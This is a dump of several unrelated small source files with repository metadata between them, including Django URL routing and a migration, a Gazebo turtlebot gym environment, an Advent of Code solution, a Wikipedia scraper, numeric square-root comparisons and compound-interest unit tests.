<tr class="template-upload fade">
<td>
<span class="preview"></span>
</td>
<td>
<p class="name">{%=file.name%}</p>
{% if (file.error) { %}
<div><span class="label label-danger">{%=locale.fileupload.error%}</span> {%=file.error%}</div>
{% } %}
</td>
<td>
<p class="size">{%=o.formatFileSize(file.size)%}</p>
{% if (!o.files.error) { %}
<div class="progress progress-striped active" role="progressbar" aria-valuemin="0" aria-valuemax="100" aria-valuenow="0"><div class="progress-bar progress-bar-success" style="width:0%;"></div></div>
{% } %}
</td>
<td>
""" + _("To be uploaded") + """
</td>
<td>
{% if (!o.files.error && !i && !o.options.autoUpload) { %}
<button class="btn btn-primary start">
<i class="glyphicon glyphicon-upload"></i>
<span>""" + _("Start") + """</span>
</button>
{% } %}
{% if (!i) { %}
<button class="btn btn-warning cancel">
<i class="glyphicon glyphicon-ban-circle"></i>
<span>""" + _("Cancel") + """</span>
</button>
{% } %}
</td>
</tr>
{% } %}
</script>
<!-- The template to display files available for download -->
<script id="template-download" type="text/x-tmpl">
{% for (var i=0, file; file=o.files[i]; i++) { %}
<tr class="template-download fade">
<td>
<span class="preview">
{% if (file.thumbnailUrl) { %}
<a href="{%=file.url%}" title="{%=file.name%}" download="{%=file.name%}" data-gallery><img src="{%=file.thumbnailUrl%}"></a>
{% } %}
</span>
</td>
<td>
<p><a href="{%=file.url%}" title="{%=file.name%}" download="{%=file.name%}" {%=file.thumbnailUrl?'data-gallery':''%}>{%=file.name%}</a></p>
</td>
<td>
<span class="size">{%=o.formatFileSize(file.size)%}</span>
</td>
<td>
<p class="name">
<button class="btn btn-primary copy-url" data-url="{%=file.full_url%}">
<i class="glyphicon glyphicon-copy"></i>
<span>""" + _("Copy URL") + """</span>
</button>
</p>
{% if (file.error) { %}
<div><span class="label label-danger">{%=locale.fileupload.error%}</span> {%=file.error%}</div>
{% } %}
</td>
<td>
<button class="btn btn-danger delete" data-type="{%=file.deleteType%}" data-url="{%=file.deleteUrl%}"{% if (file.deleteWithCredentials) { %} data-xhr-fields='{"withCredentials":true}'{% } %}>
<i class="glyphicon glyphicon-trash"></i>
<span>""" + _("delete") + """</span>
</button>
<input type="checkbox" name="delete" value="1" class="toggle">
</td>
</tr>
{% } %}
</script>
""")
|
[
"KomeijiSatori07@gmail.com"
] |
KomeijiSatori07@gmail.com
|
083277fc7c133a970f3166b8aa8e562115f140b5
|
06b67ac9f8c10225cead8b5f5d3afb29816f8585
|
/Main.py
|
7b2897bbdd1a02868ba32ccd82005dc7ff84765d
|
[] |
no_license
|
agordo25/Class-work-5-15
|
d9224849a9aca673a80b5a3349aa9625957c3b40
|
a5f88f9a5dc7596315c6a04e601f8c0c5f155db0
|
refs/heads/master
| 2020-03-17T11:35:50.143449
| 2018-05-17T18:15:06
| 2018-05-17T18:15:06
| 133,557,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
from room import Room
# Create the rooms and link them together
kitchen = Room("Kitchen")
kitchen.set_description("A dank and dirty room buzzing with flies.")
dining_hall = Room("Dining Hall")
dining_hall.set_description("A large room, with ornate golden decorations on each wall.")
ballroom = Room("Ballroom")
ballroom.set_description("A vast room with a shiny floor. Huge candlesticks guard the entrance.")
kitchen.link_room(dining_hall, "south")
dining_hall.link_room(kitchen, "north")
dining_hall.link_room(ballroom, "west")
ballroom.link_room(dining_hall, "east")
|
[
"noreply@github.com"
] |
agordo25.noreply@github.com
|
0c2b3036624182822fb7490d40d6132819d75165
|
4f82f0d47c1ad5fce5cfb01226ee24938ffcbb1d
|
/my_notes/apps/account/urls.py
|
0fadb206b4294167205c4afa67c14cdf32f8c167
|
[] |
no_license
|
khusainovrm/my_notes
|
fe042d9b43423c041c24649e4799b37c889e6b14
|
a672bc233d9327ebb1aeb0cbb161488b3d0ba269
|
refs/heads/master
| 2021-04-16T18:47:18.945225
| 2020-03-26T09:01:15
| 2020-03-26T09:01:15
| 249,376,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
app_name = "account"
urlpatterns = [
# previous login view
# path('login/', views.user_login, name='login'),
    path('login/', auth_views.LoginView.as_view(), name='login'),
    path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('', views.dashboard, name='dashboard'),
]
|
[
"37953890+khusainovrm@users.noreply.github.com"
] |
37953890+khusainovrm@users.noreply.github.com
|
73b2a72cf03900d1f809ced86925d237da893e05
|
2ebe38fe3251750fb992d1817cf5249573c8f3dc
|
/hxldash/processing_scripts/topojson_to_gz.py
|
0f35cabb7208ceec0b687f79cc70876672606ab4
|
[
"MIT"
] |
permissive
|
SimonbJohnson/quickX3
|
c4d067aed978fb69a523e856694f5b3f7b9753d3
|
cda54c77ccf76f37246cf033d1266ac029adc36d
|
refs/heads/master
| 2021-06-24T07:47:53.857690
| 2020-11-06T12:27:49
| 2020-11-06T12:27:49
| 168,354,070
| 7
| 3
|
MIT
| 2021-06-10T23:35:10
| 2019-01-30T14:13:22
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 771
|
py
|
import os
import csv
import gzip
#params
cutOffLevel = 4
rootdir = '../static/geoms/topojson/'
#script variables
countries = []
countryList = []
fileList = {}
for subdir, dirs, files in os.walk(rootdir):
for file in files:
filePath = os.path.join(subdir, file)
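        # Paths are assumed to look like ../static/geoms/topojson/<ISO3>/<level>/geom.json,
        # so the admin level is the 11th character from the end and the country code spans [-15:-12].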
level = filePath[-11]
country = filePath[-15:-12]
        print(filePath)
        print(country)
        print(level)
if level.isdigit():
inp = '../static/geoms/topojson/'+country+'/'+str(level)
out = '../static/gz/'+country+'/'+str(level)
if not os.path.exists(out):
os.makedirs(out)
with open(inp+'/geom.json', 'rb') as f_in, gzip.open(out+'/geom.gz', 'wb') as f_out:
f_out.writelines(f_in)
|
[
"simonbjohnson@gmail.com"
] |
simonbjohnson@gmail.com
|
c5ec23629e7505139473c17b90cfc7d9f78522f6
|
39c1de5995c11beabb1aebf1ca6d02d45bb73311
|
/day3/day3-1en2.py
|
d022a8536db733544af102298a8052e82766c7bc
|
[] |
no_license
|
Pannekoek-Jona/AdventOfCode2020
|
24d70ac57abc131e176e6635e0ffbc20893e75ee
|
b69103c1bc1b3b6564f6dd8e8d58b08857d61b26
|
refs/heads/main
| 2023-01-24T14:06:40.982321
| 2020-12-10T19:29:50
| 2020-12-10T19:29:50
| 320,365,215
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
with open('day3/day3puzzle1.txt', 'r') as f:
treeArray = f.readlines()
trees = 0
place = 0
offset = 0
sum = 1
stepSize = [1, 3, 5, 7]
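# The first loop counts trees hit for each rightward step size (down 1 each line), wrapping
# horizontally via the offset; the separate (right 1, down 2) slope is handled by the second loop below.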
if __name__ == '__main__':
length = len(treeArray[0]) - 1
for iteration in stepSize:
trees = 0
place = 0
offset = 0
        print('iteration = ', iteration)
for line in treeArray[1:]:
place = place + iteration
if line[place] == '#':
trees += 1
if place > length - 1 - iteration:
offset = length - place
place = 0 - offset
print('number of trees in iteration:', iteration, 'is', trees)
sum = sum * trees
print('sum', sum)
count = 1
trees = 0
place = 0
offset = 0
for line in treeArray[1:]:
count += 1
if count % 2 == 1:
place = place + 1
print(line[:place+1])
print(line[place], place)
if line[place] == '#':
trees += 1
if place > length - 1 - 1:
offset = length - place
print('offset', offset)
place = 0 - offset
print(trees)
sum = sum * trees
print(sum)
|
[
"noreply@github.com"
] |
Pannekoek-Jona.noreply@github.com
|
79726d5eb1481d93b134ae06b20764e1f8ebe3eb
|
b20cc38a18bba960ef9b0278cafde833397e506d
|
/plantcv/learn/__init__.py
|
34ad1d8165c9ceeb803b031925faad19db37183f
|
[
"MIT"
] |
permissive
|
judgementc/plantcv
|
c44f1041bedf76f2f146131d594f7acdff26d944
|
6633dc457ffa1e54d1a3b7b8b4653607f23396b6
|
refs/heads/master
| 2021-07-14T22:31:03.750674
| 2017-10-21T12:54:58
| 2017-10-21T12:54:58
| 107,865,158
| 1
| 0
| null | 2017-10-22T12:47:41
| 2017-10-22T12:47:41
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
from .naive_bayes import naive_bayes
from .naive_bayes import naive_bayes_multiclass
__all__ = ["naive_bayes", "naive_bayes_multiclass"]
|
[
"noahfahlgren@gmail.com"
] |
noahfahlgren@gmail.com
|
3610cfe8844edef8cea50aa2954c3dab2e06eaa7
|
41464d5effa3bcbaa1154e18d5a1199b0a36eb9b
|
/Egz/egz3.py
|
e22fc24777e8e153d7677afbbb855f77437a88a9
|
[] |
no_license
|
kziel445/WizualizacjaDanych
|
da14d5dd3a766475c7c99bbceade775a933f263b
|
89ac340efbf88f48d3a31791bf90820917583725
|
refs/heads/master
| 2022-05-27T02:38:44.917593
| 2019-06-24T04:17:06
| 2019-06-24T04:17:06
| 173,711,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
import pandas as pd
import numpy as np
class czas:
def __init__(self,godzina,minuta):
self.godzina = godzina
self.minuta = minuta
def zegar(czas):
if(czas.minuta<10):
czas.minuta="0" + str(czas.minuta)
print(str(czas.godzina) +":"+ str(czas.minuta))
slownik = {i :i*i for i in range(99)}
for x in list(slownik)[94:99]:
print(slownik[x])
zegar(czas(2,10))
df = pd.read_csv("przepis.csv",sep="#")
df = df.set_index(df['Składnik'])
df = df.drop(columns=['Składnik'],axis=0)
df2 = pd.DataFrame([[10,'Sól'],[20,'Jajka']])
df2.columns=['Waga w g','Składniki']
df2 = df2.set_index(df2['Składniki'])
df2 = df2.drop(columns=['Składniki'])
df = df.append(df2)
print(df)
|
[
"noreply@github.com"
] |
kziel445.noreply@github.com
|
c740d3355351568bdd35bb5a83a19d6658521d3f
|
68a66b222a8e81fbbef36e3b26cff16215a21f90
|
/caffeine_buzz.py
|
faa26d3bf351b68659c0c750965f79a43e21377f
|
[] |
no_license
|
jeffwright13/codewars
|
725fd7d19db4b31f1d4c45fbb21f0e2b8f774425
|
92d16edd1441230e7c4ddc466b893e5ba5929e98
|
refs/heads/master
| 2020-04-15T15:02:36.704016
| 2016-11-09T18:38:17
| 2016-11-09T18:38:17
| 53,176,971
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,178
|
py
|
def main():
    print(caffeineBuzz.__doc__)
def caffeineBuzz(n):
"""
Complete the function caffeineBuzz, which takes a non-zero integer as its one argument.
If the integer is divisible by 3, return the string "Java".
If the integer is divisible by 3 and divisible by 4, return the string "Coffee"
If the integer is one of the above and is even, add "Script" to the end of the string.
Otherwise, return the string "mocha_missing!"
caffeineBuzz(1) => "mocha_missing!"
caffeineBuzz(3) => "Java"
caffeineBuzz(6) => "JavaScript"
caffeineBuzz(12) => "CoffeeScript"
"""
if n % 3 == 0:
if n % 4 == 0:
if n % 2 == 0:
return 'CoffeeScript'
else:
return 'Coffee'
else:
if n % 2 == 0:
return 'JavaScript'
else:
return 'Java'
else:
return 'mocha_missing!'
def test_caffeineBuzz():
assert caffeineBuzz(1) == 'mocha_missing!'
assert caffeineBuzz(3) == 'Java'
assert caffeineBuzz(6) == 'JavaScript'
assert caffeineBuzz(12) == 'CoffeeScript'
if __name__ == "__main__":
main()
|
[
"jeff.washcloth@gmail.com"
] |
jeff.washcloth@gmail.com
|
3d779742f29c16ee13bfb33d566c6f0d3d9adba2
|
2ee6d6cc371bb1fa3f8703f704715a3a3f430380
|
/edges.py
|
21abf67df6e176037944bd3eb65a5fef455d40b8
|
[] |
no_license
|
maxhugouhr/PongLike
|
db2e84162288a8c5b468806b81cc764d18e05323
|
3426087517013f0fa04164af904b7ce750c14170
|
refs/heads/master
| 2023-03-20T09:33:35.588865
| 2021-03-06T01:47:24
| 2021-03-06T01:47:24
| 323,169,449
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
from surface import Surface
from constants import Constant
import time
class Edge(Surface):
def __init__(self, speed, leftEnd, rightEnd , color, width,reflector,speedMultiplier,defAngle):
super().__init__(speed,leftEnd, rightEnd, color, width, reflector, speedMultiplier, defAngle)
self.isTeleporter = False
self.twin = Surface()
def impact(self,ball):
if ball.lastHitObject != id(self): #ensures the ball can't bounce twice off the same surface
self.lastHitTime = time.time_ns()
ball.lastHitObject = id(self)
if self.isTeleporter:
self.teleport(ball)
else:
self.reflect(ball)
def teleport(self,ball):
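        # Map the ball's relative position along this edge onto the same relative
        # position along the twin edge, then hand off collision ownership to the twin.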
fraction = (ball.position[1] - self.leftEndpoint[1]) / self.length
ball.position[0] = self.twin.leftEndpoint[0]
ball.position[1] = fraction * self.twin.length + self.twin.leftEndpoint[1]
ball.lastHitObject = id(self.twin)
def makeTeleporter(self, twin):
self.isTeleporter = True
twin.isTeleporter = True
self.twin = twin
twin.twin = self
|
[
"uhr.max@gmail.com"
] |
uhr.max@gmail.com
|
6dbac82a2398412d3e591e295b6932a3eeabad81
|
06763b248d49851be920fee5e96d6055f04c5f5d
|
/src/open_ai_gym_construct/gym_gazebo/envs/gazebo_maze_turtlebot_lidar.py
|
1b0a52a9738bffd3db05708c16d37305bd2631cd
|
[] |
no_license
|
AT-main/rl_openai_ros
|
46d40c84c64be7e802c3a7ed3da5f945fed8920a
|
f6c22439ff625f41c390e14b86627fdda4b3b450
|
refs/heads/master
| 2022-12-31T19:05:03.341416
| 2020-10-10T20:16:54
| 2020-10-10T20:16:54
| 302,960,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,464
|
py
|
import gym
import rospy
import roslaunch
import time
import numpy as np
from gym import utils, spaces
from gym_gazebo.envs import gazebo_env
from geometry_msgs.msg import Twist
from std_srvs.srv import Empty
from sensor_msgs.msg import LaserScan
from gym.utils import seeding
class GazeboMazeTurtlebotLidarEnv(gazebo_env.GazeboEnv):
def __init__(self):
# Launch the simulation with the given launchfile name
gazebo_env.GazeboEnv.__init__(self, "GazeboMazeTurtlebotLidar_v0.launch")
self.vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=5)
self.unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
self.pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
self.reset_proxy = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
self.action_space = spaces.Discrete(3) #F,L,R
self.reward_range = (-np.inf, np.inf)
self._seed()
def discretize_observation(self,data,new_ranges):
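        # Downsample the laser scan into roughly new_ranges discrete readings (Inf -> 6,
        # NaN -> 0, otherwise the truncated range) and set done=True when an obstacle
        # is closer than min_range.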
discretized_ranges = []
min_range = 0.2
done = False
mod = len(data.ranges)/new_ranges
for i, item in enumerate(data.ranges):
if (i%mod==0):
if data.ranges[i] == float ('Inf'):
discretized_ranges.append(6)
elif np.isnan(data.ranges[i]):
discretized_ranges.append(0)
else:
discretized_ranges.append(int(data.ranges[i]))
if (min_range > data.ranges[i] > 0):
done = True
return discretized_ranges,done
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
rospy.wait_for_service('/gazebo/unpause_physics')
try:
self.unpause()
except rospy.ServiceException, e:
print ("/gazebo/unpause_physics service call failed")
if action == 0: #FORWARD
vel_cmd = Twist()
vel_cmd.linear.x = 0.25
vel_cmd.angular.z = 0.0
self.vel_pub.publish(vel_cmd)
elif action == 1: #LEFT
vel_cmd = Twist()
vel_cmd.linear.x = 0.05
vel_cmd.angular.z = 0.3
self.vel_pub.publish(vel_cmd)
elif action == 2: #RIGHT
vel_cmd = Twist()
vel_cmd.linear.x = 0.05
vel_cmd.angular.z = -0.3
self.vel_pub.publish(vel_cmd)
data = None
while data is None:
try:
data = rospy.wait_for_message('/kobuki/laser/scan', LaserScan, timeout=5)
except:
print "Time out /kobuki/laser/scan"
pass
rospy.wait_for_service('/gazebo/pause_physics')
try:
#resp_pause = pause.call()
self.pause()
except rospy.ServiceException, e:
print ("/gazebo/pause_physics service call failed")
state,done = self.discretize_observation(data,5)
if not done:
if action == 0:
reward = 3
else:
reward = 1
else:
reward = -200
return state, reward, done, {}
def _reset(self):
# Resets the state of the environment and returns an initial observation.
rospy.wait_for_service('/gazebo/reset_simulation')
try:
#reset_proxy.call()
self.reset_proxy()
except rospy.ServiceException, e:
print ("/gazebo/reset_simulation service call failed")
# Unpause simulation to make observation
rospy.wait_for_service('/gazebo/unpause_physics')
try:
#resp_pause = pause.call()
self.unpause()
except rospy.ServiceException, e:
print ("/gazebo/unpause_physics service call failed")
#read laser data
data = None
while data is None:
try:
data = rospy.wait_for_message('/kobuki/laser/scan', LaserScan, timeout=5)
except:
print "Something went wrong reading /kobuki/laser/scan"
pass
rospy.wait_for_service('/gazebo/pause_physics')
try:
#resp_pause = pause.call()
self.pause()
except rospy.ServiceException, e:
print ("/gazebo/pause_physics service call failed")
        state, done = self.discretize_observation(data, 5)
return state
|
[
"amirtajik@gmail.com"
] |
amirtajik@gmail.com
|
77f6eb4b33c65e1b6cef2405872ca24d819e7a93
|
d1507ee333bf9453a197fe997b58871b527811bf
|
/venv/bin/rst2man.py
|
ed1e5f4d0b2f0a71bdbadc1e6014ceae130052f1
|
[] |
no_license
|
hirossan4049/screenshare
|
a336f2cf0e0584866356a82f13683480d9d039f6
|
004f0e649116a6059af19d6489aeb13aed1741f3
|
refs/heads/master
| 2021-01-27T09:21:48.891153
| 2020-04-12T04:55:40
| 2020-04-12T04:55:40
| 243,476,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#!/Users/linear/Documents/pg/pythonnnnn/screenshare/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
|
[
"haruto405329@gmail.com"
] |
haruto405329@gmail.com
|
98765afe90a8d371096186263aeb181ac0d088cc
|
97849f5073755d038f376358d93e46c0677f630f
|
/GOZI4/step40.py
|
b6dbf8080a5666b976fa60f8bb5cb7e9acc5e7e5
|
[] |
no_license
|
hjkornn-phys/DZero
|
871aa1aca3e9887b7a66fc5979be10039a1deb94
|
9f7bcde270da6bcf5e7390d47869872ec78eb0b6
|
refs/heads/main
| 2023-05-14T11:54:04.318930
| 2021-06-07T07:00:14
| 2021-06-07T07:00:14
| 370,917,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
if "__file__" in globals():
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import numpy as np
from dezero import *
""" x = np.array([[1, 2, 3], [4, 5, 6]])
y = sum_to(x, (1, 3))
print(y)
y = sum_to(x, (2, 1))
print(y) """
x_0 = Variable(np.array([1, 2, 3]))
x_1 = Variable(np.array([10]))
y = x_0 + x_1
print(y)
y.backward()
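# x_1 has shape (1,) and was broadcast to shape (3,), so its gradient is the upstream
# gradient summed back over the broadcast axis: the expected value is [3].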
print(x_1.grad)
|
[
"hjkornn@gmail.com"
] |
hjkornn@gmail.com
|
8c98ceaad7c761fc5f69acd8af7cb795eac0e32c
|
42585715e356b3616b300430ef93d3f977ab5c7b
|
/lesson08/sqrt_cal.py
|
14b90ff7f518b845e2e104c1b5d00fdf3ea21852
|
[] |
no_license
|
hcmMichaelTu/python
|
78d8c9cd22978988c3c573aa82f0dddf34d2d9e1
|
6d3c6214ba44d1279ae484ab32e12869bfe335ae
|
refs/heads/master
| 2023-06-20T13:23:25.921831
| 2020-09-22T11:20:41
| 2020-09-22T11:20:41
| 383,787,369
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
import math
def builtin_pow_sqrt(x):
return pow(x, 0.5)
def math_pow_sqrt(x):
return math.pow(x, 0.5)
def exp_operator_sqrt(x):
return x ** 0.5
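# Newton's method for square roots: starting from y = x, repeatedly replace y with the
# average of y and x/y, i.e. y_{k+1} = (y_k + x/y_k) / 2, which converges to sqrt(x).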
def Newton_sqrt(x):
y = x
for i in range(100):
y = y/2 + x/(2*y)
return y
def cal_sqrt(method, method_name):
print(f"Tính căn bằng phương pháp {method_name}:")
print(f"a) Căn của 0.0196 là {method(0.0196):.9f}")
print(f"b) Căn của 1.21 là {method(1.21):.9f}")
print(f"c) Căn của 2 là {method(2):.9f}")
print(f"d) Căn của 3 là {method(3):.9f}")
print(f"e) Căn của 4 là {method(4):.9f}")
print(f"f) Căn của {225/256} là {method(225/256):.9f}")
cal_sqrt(math.sqrt, "math’s sqrt")
cal_sqrt(builtin_pow_sqrt, "built-in pow")
cal_sqrt(math_pow_sqrt, "math’s pow")
cal_sqrt(exp_operator_sqrt, "exponentiation operator")
cal_sqrt(Newton_sqrt, "Newton’s sqrt")
|
[
"noreply@github.com"
] |
hcmMichaelTu.noreply@github.com
|
0ac3037411b7aa786fcb2488bb17022c990ab351
|
cb3583cc1322d38b1ee05cb1c081e0867ddb2220
|
/home/migrations/0004_auto_20210409_1110.py
|
11d2ae4cb1d8c4d7d1fece40e5c722c405c4a1e4
|
[
"MIT"
] |
permissive
|
iamgaddiel/codeupblood
|
9e897ff23dedf5299cb59fd6c44d9bd8a645e9c6
|
a0aa1725e5776d80e083b6d4e9e67476bb97e983
|
refs/heads/main
| 2023-05-07T23:34:27.475043
| 2021-04-24T20:49:08
| 2021-04-24T20:49:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
# Generated by Django 3.1.6 on 2021-04-09 18:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_auto_20210409_1110'),
]
operations = [
migrations.AlterField(
model_name='partner',
name='class_id',
field=models.CharField(default='JkQUX', max_length=150),
),
migrations.AlterField(
model_name='sponsor',
name='class_id',
field=models.CharField(default='qUKNz', max_length=150),
),
]
|
[
"www.spbiology@gmail.com"
] |
www.spbiology@gmail.com
|
233594639eeefe9bbfc2d4d3922529eab7a30057
|
7690d57d0ec12f8da1acf9d86c2648c672f029b4
|
/impress/ch3/bs_2.py
|
8b58037c3eee594378bfedb259248bff8ac96e5c
|
[] |
no_license
|
ducksfrogs/scrayPy
|
27f5b4f1f8d37b9e9e99961fcfa03a65fd7095ea
|
43d05e32f542a24b7d6853809e2094a9d139539d
|
refs/heads/master
| 2022-11-23T02:23:36.125834
| 2020-07-25T21:57:52
| 2020-07-25T21:57:52
| 261,369,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 833
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'https://en.wikipedia.org/w/index.php' + \
'?title=List_of_Game_of_Thrones_episodes&oldid=802553687'
r = requests.get(url)
html_contents = r.text
html_soup = BeautifulSoup(html_contents, 'html.parser')
episodes = []
ep_tables = html_soup.find_all('table', class_='wikiepisodetable')
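# Each Wikipedia episode table is parsed row by row: the header cells of the first <tr>
# become the dict keys, and every later row is turned into one {header: cell text} dict per episode.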
for table in ep_tables:
headers = []
rows = table.find_all('tr')
for header in table.find('tr').find_all('th'):
headers.append(header.text)
for row in table.find_all('tr')[1:]:
values= []
for col in row.find_all(['th', 'td']):
values.append(col.text)
if values:
episode_dict = {headers[i]: values[i] for i in range(len(values))}
episodes.append(episode_dict)
for episode in episodes:
print(episode)
|
[
"ma_yamaki@yahoo.com"
] |
ma_yamaki@yahoo.com
|
4b13a19067049c5152eae0c196d301498feacf47
|
cdf91520568faf2e63ce12b3007cc39f8cf367c1
|
/compound/calculator_test.py
|
bfcf973935c4ee2c7690057c5fc9454711adb2f2
|
[] |
no_license
|
rsarathy/yield-curve
|
664d552a93bddbedab313681014cf2aad51938a8
|
618e27bf6a11f30622e2f81918a0e3769a2224d8
|
refs/heads/master
| 2020-06-15T16:42:56.149511
| 2019-09-02T21:10:49
| 2019-09-02T21:10:49
| 195,344,501
| 0
| 0
| null | 2019-09-02T21:10:50
| 2019-07-05T05:32:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,370
|
py
|
from compound.calculator import monthly_rate, monthly
import unittest
class CompoundTest(unittest.TestCase):
def test_monthly_rate(self):
"""
Checks that monthly_rate() produces the correct monthly growth rate when
given a valid annual growth rate.
"""
# 1.00797414**12 = 1.1
self.assertAlmostEqual(monthly_rate(1.1), 1.00797414)
def test_compound_zero_years(self):
"""
Checks that monthly() produces the initial value of an investment after no
years.
"""
value, contributions = monthly(1000, 100, 1.1, 0)
self.assertEqual(contributions, 1000)
self.assertEqual(value, 1000)
def test_compound_monthly_one_year_no_deposits(self):
"""
Checks that monthly() produces the correct total value of an investment
after a single year, but with no regular monthly deposits.
"""
value, contributions = monthly(1000, 0, 1.1, 1)
self.assertEqual(contributions, 1000)
self.assertAlmostEqual(value, 1100)
def test_compound_monthly_one_year_with_deposits(self):
"""
Checks that monthly() produces the correct total value of an investment
after a single year with regular monthly deposits.
"""
value, contributions = monthly(1000, 100, 1.1, 1)
self.assertEqual(contributions, 2200)
self.assertAlmostEqual(value, 2354.05)
if __name__ == '__main__':
unittest.main()
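# A minimal sketch of the functions under test, consistent with the expectations above
# (the real compound.calculator implementation may differ in detail): monthly_rate()
# converts an annual growth factor to its monthly equivalent, and monthly() compounds
# the balance each month and then adds the deposit.
#
#     def monthly_rate(annual_rate):
#         return annual_rate ** (1 / 12)
#
#     def monthly(initial, deposit, annual_rate, years):
#         rate = monthly_rate(annual_rate)
#         value, contributions = float(initial), initial
#         for _ in range(12 * years):
#             value = value * rate + deposit
#             contributions += deposit
#         return value, contributions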
|
[
"rohit@sarathy.org"
] |
rohit@sarathy.org
|